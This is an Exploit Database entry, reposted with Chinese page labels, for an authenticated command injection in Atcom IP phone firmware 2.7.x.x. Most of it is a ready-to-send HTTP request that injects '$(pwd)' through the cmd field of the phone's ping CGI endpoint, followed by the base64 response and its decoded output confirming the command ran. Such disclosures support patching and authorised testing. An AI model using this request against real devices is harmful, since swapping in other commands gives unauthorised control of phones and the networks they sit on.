Atcom 2.7.x.x – Authenticated Command Injection

• Exploit Database
• 22 阅读

• 作者： Mohammed Adel
  日期： 2023-10-09
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51742/

• # Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
  # Google Dork: N/A
  # Date: 07/09/2023
  # Exploit Author: Mohammed Adel
  # Vendor Homepage: https://www.atcom.cn/
  # Software Link:
  https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
  # Version: All versions above 2.7.x.x
  # Tested on: Kali Linux
  
  
  Exploit Request:
  
  POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
  Host: {TARGET_IP}
  User-Agent: polar
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 49
  Authorization: Digest username="admin", realm="IP Phone Web
  Configuration", nonce="value_here",
  uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
  response="value_here", qop=auth, nc=value_here, cnonce="value_here"
  
  cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
  
  
  Response:
  
  {"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
  
  The value of "ping_cmd_result" is encoded as base64. Decoding the
  value of "ping_cmd_result" reveals the result of the command executed
  as shown below:
  
  ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'